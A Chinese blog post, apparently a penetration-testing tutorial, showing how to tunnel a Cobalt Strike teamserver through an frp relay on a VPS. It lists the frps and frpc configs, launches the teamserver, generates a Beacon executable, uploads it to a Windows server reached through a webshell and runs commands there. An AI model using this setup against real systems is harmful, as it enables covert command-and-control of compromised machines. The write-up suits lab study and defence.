CS使用frp实现内网穿透

已于 2023-12-05 15:22:56 修改
阅读量737 收藏 12
点赞数 8
分类专栏: 渗透 文章标签: 网络安全
于 2023-12-05 15:21:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_48654636/article/details/134807846
版权

CS使用frp实现内网穿透

跳板机(vps):124.220.93.x
攻击机 kali:192.168.8.8 ,主要架设CS,启动 CS
靶机:windows server 2012:124.222.180.x,也就是拿到WebShell的机器
在这里插入图片描述

1. vps 服务端frps.ini配置

在这里插入图片描述

[common]
bind_port = 7000

#以下可不要
dashboard_port = 7500
dashboard_user = admin
dashboard_pwd = admin
enable_prometheus = true

启动服务端

在这里插入图片描述

2. kali 客户端frpc.ini配置(攻击机)

在这里插入图片描述

[common]
server_addr = 124.220.93.149
server_port = 7000
 
[CS_Server_9050]
type = tcp
local_ip = 192.168.8.8
local_port = 50050
remote_port = 9050
 
[test_Beacon_9080]
type = tcp
local_ip = 192.168.8.8
local_port = 9080
remote_port = 9080

启动客户端

在这里插入图片描述
当运行成功之后,云服务器端(vps)会显示建立连接
在这里插入图片描述

3. cobaltstrike

cs 服务端

sudo ./teamserver 192.168.8.8 123

在这里插入图片描述
在这里可以看到端口是50050,此时的端口要和上面的frpc.ini中端口对应
因为这个端口的流量转发给了Linux的9050端口

cs 客户端

这里需要使用vps的ip和端口(9050)来操作

./cobaltstrike

在这里插入图片描述
在这里插入图片描述
当连接建立成功之后,frp服务端会有反应
在这里插入图片描述
此时成功将内网的CS使用frp进行了穿透
接下来就是攻击测试了

4. 设置监听

在这里插入图片描述
设置完成后点击保存
完成后如下:
在这里插入图片描述

5. 上线测试

attack生成攻击exe
在这里插入图片描述
选择监听器
在这里插入图片描述
点击生成
在这里插入图片描述
保存生成好的exe
在这里插入图片描述
上传到获取webshell的靶机(被攻击的机器)
在这里插入图片描述
运行
在这里插入图片描述
在cs客户端查看,发现成功上线(鼓掌😎)
在这里插入图片描述
在这里插入图片描述

此时vps服务端也会收到上线后的消息
在这里插入图片描述
执行操作
在这里插入图片描述

shell ipconfig

在这里插入图片描述

shell whoami

在这里插入图片描述

Lang-1210
关注
  • 8
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网渗透-cobaltstrike之cs上线获取shell
lza20001103的博客
04-30 6950
cobaltstrike之cs上线获取shell
内网穿透-Frp--上线
尘玥的故事
09-26 606
frp是一个专注于内网穿透的高性能的反向代理应用,支持TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网IP节点的中转暴露到公网。两个内网直接相互通信
Frp--实现CS结构的内网穿透
weixin_45432093的博客
07-13 1265
参考官方文档: https://gofrp.org/docs/ frp 是什么? frp 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网。 为什么使用 frp? 通过在具有公网 IP 的节点上部署 frp 服务端,可以轻松地将内网服务穿透到公网,同时提供诸多专业的功能特性,这包括: 客户端服务端通信支持 TCP、KCP 以及 Websocket 等多种协议。 采用 TCP 连接流式复
内网渗透-不出网cs的各种姿势(内网穿透
m0_68976043的博客
05-20 1089
官网介绍:SMB Beacon使用命名管道通过父级Beacon进行通讯,当两个Beacons连接后,子Beacon从父Beacon获取到任务并发送。因为连接的Beacons使用Windows命名管道进行通信,此流量封装在SMB协议中,所以SMB Beacon相对隐蔽,绕防火墙时可能发挥奇效。
CobaltStrike之内网穿透(Socks 隧道)
2301_76227305的博客
02-03 1378
众所周知,公网是无法直接访问内网的。但是如果我们控制了一台处于内网和公网边缘的服务器(就是同时有公网IP和私网IP),那么我们便可以利用这个服务器当作跳板,实现对目标内网的访问。之前一直不是很清楚内网与公网这个联系,通过自己搭建环境和配置ip,收获了很多知识。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
CS的下载+内网穿透
最新发布
hellodaoyan的博客
05-31 763
NC连接后没有任何回显先受控房 nc.exe -l -p 12345然后攻击方 nc.exe ip port 12345扫描端口上传和 nc.exe 同一目录下的文件。
利用frpcs的shell派生到msf
weixin_43939009的博客
06-27 726
msf作为内网渗透中强大的工具,集成了许多漏洞利用的EXP,以及各种扫描功能便于使用,今天介绍使用Frpcs的shell派生到msf,满足内网渗透中的需求。 第一步: 首先我们连上cs后,我们需要去监听器修改参数。 我们这里Add添加一个,随便写个名字,这里我写了msf,模式选择foreign HTTP模式,HTTP Host出填写自己的VPS地址,端口随意,我这里是1080端口。填写完毕Save即可。 第二步: 在自己的vps上启动frp服务端,frp不多做介绍,目前主流的内网穿透工具,这里基础使用
实现类似花生壳功能的实现内网穿透服务V3.0.rar
03-26
实现类似花生壳内网穿透服务 server.exe 放到阿里云或者云平台等服务器上 ,打开端口 client.exe 放在应用软件同一个电脑或者同一个局域网内 该软件有两个配置信息 服务器:填写server.exe所在电脑的的ip:端口 应用...
python cs架构实现简单文件传输
12-25
本文为大家分享了python cs架构实现简单文件的传输代码,供大家参考,具体内容如下 要实现简单文件的传输我们必须考虑这些问题: 1.什么是c/s架构? 顾名思义,就是客户端端/服务器架构。不同的人可能回答不一,但是...
CS55产品使用说明书.pdf
05-12
长安汽车,CS55产品使用说明书,官方PDF版本,完整全套说明书!
运用CS7123芯片实现VGA/XGA电视盒设计方案
11-08
CS7123芯片是深圳市芯海科技有限公司自主设计的高速/高精度视频DAC芯片,其内部包括三路10位电流导引(Current Steering)结构的DAC,最大采样速度达到240MHz。CS7123结构框图见图1,它包括三路高速、10位输入的视频DA...
Cobalt Strike骚操作之使用内网穿透进行免公网IP上线
夜未至
06-25 1266
cs上线一般情况下,都需要公网IP,但是公网IP太贵了,而且服务器上放这些都不太安全,平时用的不多,但是用的时候就又麻烦,所以这种时候可以使用内网穿透技术了。
华为云云耀云服务器L实例评测|搭建CounterStrike Source Delicated Server(CS起源游戏服务器)
jamenu的博客
09-27 1589
Steamcmd是Steam的命令行工具,可以在命令行中执行命令,在下载CounterStrike Source Deilicated Server前,需要先行登录Steamcmd.当你进入steamcmd中后,可以选择登录自己的steam账号,也可以选择匿名登录,并不需要登录也可以下载CounterStrikeSource Delicated Server。(server.cfg是服务器的配置文件,可以在其中详细定义服务器的设置,比如对局时间,最大比分…这里给出一个样例,具体的设置可以查阅文档。
记一次自建靶场三层代理内网渗透过程
Boom!脑洞大爆炸的博客
07-04 733
记一次自建靶场三层代理内网渗透过程
Cobalt Strike使用 frp 内网穿透 上线
qq_41728581的博客
03-05 3371
首先需要公网ip 100多买了个国内的服务器 流泪了 要是路由器能获得公网ip多好 这里部署的是 cs server和client 在同一台内网主机上 如果不是 有些地方需要自行调整修改 云服务器 开启frps 首先在服务器上运行frps 精简配置就可以 (Ubuntu18开机自启 https://www.jianshu.com/p/9274b18b35e3/) frps.ini如下 [common] bind_port = 7000 如果想要转发 必须要开放防火墙 服务器的话就在安全组里边.
内网穿透神器-frp的概念,搭建和使用,方便访问内网服务
黄乔国PHP
09-03 2111
客户端服务端通信支持 TCP、QUIC、KCP 以及 Websocket 等多种协议。采用 TCP连接流式复用,在单个连接间承载更多请求,节省连接建立时间,降低请求延迟。代理组间的负载均衡。端口复用,多个服务通过同一个服务端端口暴露。支持 P2P 通信,流量不经过服务器中转,充分利用带宽资源。多个原生支持的客户端插件(静态文件查看,HTTPS/HTTP 协议转换,HTTP、SOCK5 代理等),便于独立使用 frp客户端完成某些工作。
【内网安全-隧道搭建】内网穿透_Frp上线、测试
qq_53058639的博客
01-27 1256
目录Frp(简易上线)1、简述:2、工具:3、使用:1、准备:2、服务端(公网):2、客户端(内网):3、测试方法:4、生成后门木马监听: 我一共划分了六个阶段,但并不是说你得学完全部才能上手工作,对于一些初级岗位,学到第三四个阶段就足矣~这里我整合并且整理成了一份【282G】的网络安全从零基础入门到进阶资料包,需要的小伙伴可以扫描下方CSDN官方合作二维码免费领取哦,无偿分享!!!如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!①网络安
CS,python实现jccard算法代码
03-31
以下是使用Python实现Jaccard算法的代码示例: ```python def jaccard_similarity(set1, set2): """ 计算两个集合之间的Jaccard相似度。 :param set1: 集合1 :param set2: 集合2 :return: Jaccard相似度 """ intersection = len(set1.intersection(set2)) union = len(set1.union(set2)) return intersection / float(union) # 示例 set1 = set([1, 2, 3, 4, 5]) set2 = set([3, 4, 5, 6, 7]) similarity = jaccard_similarity(set1, set2) print(similarity) ``` 输出: ``` 0.375 ``` 在这个例子中,集合1和集合2的交集为{3, 4, 5},并集为{1, 2, 3, 4, 5, 6, 7},因此它们之间的Jaccard相似度为3 / 8 = 0.375。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值